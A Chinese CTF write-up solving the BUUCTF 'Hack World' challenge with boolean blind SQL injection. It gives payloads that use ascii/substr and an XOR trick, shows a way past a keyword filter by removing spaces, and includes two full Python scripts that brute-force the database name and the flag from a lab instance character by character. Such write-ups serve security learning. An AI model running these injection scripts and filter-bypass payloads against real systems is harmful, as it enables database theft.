id=0

id=1

id=2

id=3





发现结果不一样,尝试 : ">4","=4","<4" : 




在自己的环境下验证一下:




爆一下数据库:




id=(ascii(substr(database(),1,1))>32)








'''

@Modify Time      @Author

------------      -------

2019/10/25 19:28   laoalo

'''

import requests

from lxml import etree

def a():

    url="http://6a93b089-ace7-4ece-8334-b10dd79ac360.node3.buuoj.cn/"

    flag="Hello, glzjin wants a girlfriend."

    final=""

    stop=0

    for i in range(1,129):

         print("*"*50,i,"*"*50)

         stop=0

         for j in range(32,129):

             stop = j

             data={"id":"(ascii(substr(database(),%d,1))=%d)" %(i,j)}

             # data={"id":"(ascii(substr((select flag from flag),%d,1))=%d)" %(i,j)}

             re = requests.post(url=url,data=data).text.replace('\n','')

             html = etree.HTML(re).xpath("//text()")

             print(">>",html)

             if flag in html:

                  final+=chr(j)

                  print("\n\t\t\t\t",final)

                  break

         if stop >= 128:

            print("*"*50,"结束")

            print(">>",final)

            break

if __name__ == '__main__':

       a()








过滤如何处理:


在爆flag的时候发现有过滤 :select,show,""……很是难受,后来在师傅的博客上看到了这种方法:




id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))






1^1=0 ,0^0=0 ,0^1=1


1^1^1=1, 1^1^0=0
构造payload:1^ascii(mid(database(),1,1)=98)^0


注意这里会多加一个^0或1是因为在盲注的时候可能出现了语法错误也无法判断,而改变这里的0或1,如果返回的结果是不同的,那就可以证明语法是没有问题的


其实不用抑或也行:




id=(ascii(substr((select(flag)from(flag)),1,1))<128)






居然去掉空格就成功绕过了Orz,这个方法要学习一下,这里贴一下我的脚本,没有用二分十分简单的枚举:




'''

@Modify Time      @Author

------------      -------

2019/10/25 19:28   laoalo

'''

import requests

from lxml import etree

def a():

    url="http://6a93b089-ace7-4ece-8334-b10dd79ac360.node3.buuoj.cn/"

    flag="Hello, glzjin wants a girlfriend."

    final=""

    stop=0

    for i in range(1,1290):

         print("*"*50,i,"*"*50)

         stop=0

         for j in range(32,129):

             stop = j

             data={"id":"1^(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))" %(i,j)}

             re = requests.post(url=url,data=data).text.replace('\n','')

             html = etree.HTML(re).xpath("//text()")

             # print(">>",html)

             if flag in html:

                  final+=chr(j)

                  print("\n\t\t\t\t",final)

                  break

         if stop >= 128:

            print("*"*50,"结束")

            print(">>",final)

            break

if __name__ == '__main__':

       a()








参考资料:


SQL注入学习总结(八):其他SQL注入的异或注入:https://blog.csdn.net/weixin_30740295/article/details/96833688




buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World:https://blog.csdn.net/weixin_43345082/article/details/99062970


												


											
BUUCTF | [CISCN2019 华北赛区 Day2 Web1]Hack World的更多相关文章
	

    
								
  1. 刷题记录:[CISCN2019 华北赛区 Day2 Web1]Hack World
		
    目录 刷题记录:[CISCN2019 华北赛区 Day2 Web1]Hack World 一.前言 二.正文 1.解题过程 2.解题方法 刷题记录:[CISCN2019 华北赛区 Day2 Web1] ...
    
		
    2. 
						
  2. [CISCN2019 华北赛区 Day2 Web1]Hack World
		
    知识点:题目已经告知列名和表明为flag,接下来利用ascii和substr函数即可进行bool盲注 eg: id=(ascii(substr((select(flag)from(flag)),1,1 ...
    
		
    3. 
						
  3. BUUOJ [CISCN2019 华北赛区 Day2 Web1]Hack World
		
    补一下这道题,顺便发篇博客 不知道今年国赛是什么时候,菜鸡还是来刷刷题好了 0X01 考点 SQL注入.盲注.数字型 0X02自己尝试 尝试输入1 赵师傅需要女朋友吗???随便都能有好吧 输入2 ?? ...
    
		
    4. 
						
  4. 刷题[CISCN2019 华北赛区 Day2 Web1]Hack World
		
    解题思路 打开发现是很简单的页面,告诉了表名和列名,只需知道字段即可 尝试一下,输入1,2都有内容,后面无内容.输入1'让他报错,发现返回bool(false) 大概思路就是布尔型注入了,通过不断返回 ...
    
		
    5. 
						
  5. [CISCN2019 华北赛区 Day2 Web1]Hack World 1详解
		
    打开题目, 我们开始尝试注入, 输入0回显Error Occured When Fetch Result. 输入1回显Hello, glzjin wants a girlfriend. 输入2回显Do ...
    
		
    6. 
						
  6. [CISCN2019 华北赛区 Day2 Web1]Hack World(二分法写布尔注入脚本)
		
    记一道布尔注入的题,存在过滤字符. 从题目看应该是一道注入题.提示存在flag表flag列. 输入1和2的返回结果不一样,可能是布尔注入. 简单用万能密码尝试了一下.提示SQL Injection C ...
    
		
    7. 
						
  7. BUUCTF | [CISCN2019 华北赛区 Day1 Web1]Dropbox
		
    步骤: 1.运行这个: <?php class User { public $db; } class File { public $filename; } class FileList { pr ...
    
		
    8. 
						
  8. 刷题记录:[CISCN2019 华北赛区 Day1 Web1]Dropbox
		
    目录 刷题记录:[CISCN2019 华北赛区 Day1 Web1]Dropbox 一.涉及知识点 1.任意文件下载 2.PHAR反序列化RCE 二.解题方法 刷题记录:[CISCN2019 华北赛区 ...
    
		
    9. 
						
  9. PHAR伪协议&&[CISCN2019 华北赛区 Day1 Web1]Dropbox
		
    PHAR:// PHP文件操作允许使用各种URL协议去访问文件路径:如data://,php://,等等 include('php://filter/read=convert.base64-encod ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. JDBC常用接口、类介绍
			
    JDBC常用接口.类介绍 JDBC提供对独立于数据库统一的API,用以执行SQL命令.API常用的类.接口如下: DriverManager 管理JDBC驱动的服务类,主要通过它获取Connectio ...
    
			
    2. 
						
  2. Vue过渡:CSS过渡
			
    一 项目结构 二 App.vue <template> <div id="app"> <transition name="fade" ...
    
			
    3. 
						
  3. spring cloud gateway获取response body
			
    网关发起请求后,微服务返回的response的值要经过网关才发给客户端.本文主要讲解在spring cloud gateway 的过滤器中获取微服务的返回值,因为很多情况我们需要对这个返回进行处理.网 ...
    
			
    4. 
						
  4. CCNA 之 二 OSI七层模型
			
    OSI网际互联 OSI的概念 英文全称Open System Interconnect 开放系统互联参数模型,是由ISO国际标准化组织 定义的.它是个灵活的.稳健的和可互操作的模型,并不是协议,使用来 ...
    
			
    5. 
						
  5. Map3
			
    map切片: 切片的数据类型如果是map,则我们称为 slice of map, map切片,这样使用则map个数就可以动态变化了. 案例演示:要求:会用一个map来记录monster的信息 name ...
    
			
    6. 
						
  6. ac自动机(tree+kmp模板)
			
    Keywords Search Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 131072/131072 K (Java/Others ...
    
			
    7. 
						
  7. Linux远程软件xshell的使用
			
    Xshell是一个linux远程命令行软件 有免费版不用破解,安装包可以找有关人士获取 要新远程一台机,可以新建会话,输入被远程系统的参数 新建会话后,点连接开始远程 远程成功的样子
    
			
    8. 
						
  8. CLR 垃圾回收知识梳理
			
    
			
    9. 
						
  9. 关于javascript中的构造函数和普通函数探索 [转]
			
    这是第一篇关于javascript模块的文章,在javascript入门的目录下,主要是记录一些对网上精彩的js研读碰到的疑惑,并做一些实验和探索 关于js中的对象和方法的定义博主感到非常的迷惑.针对 ...
    
			
    10. 
						
  10. 一、C#获取特性(坑)
			
    一.C#获取特性(坑) [Description("系统状态码")] [Display(Name = "成功", Description = "请求成 ...
    
			
    11.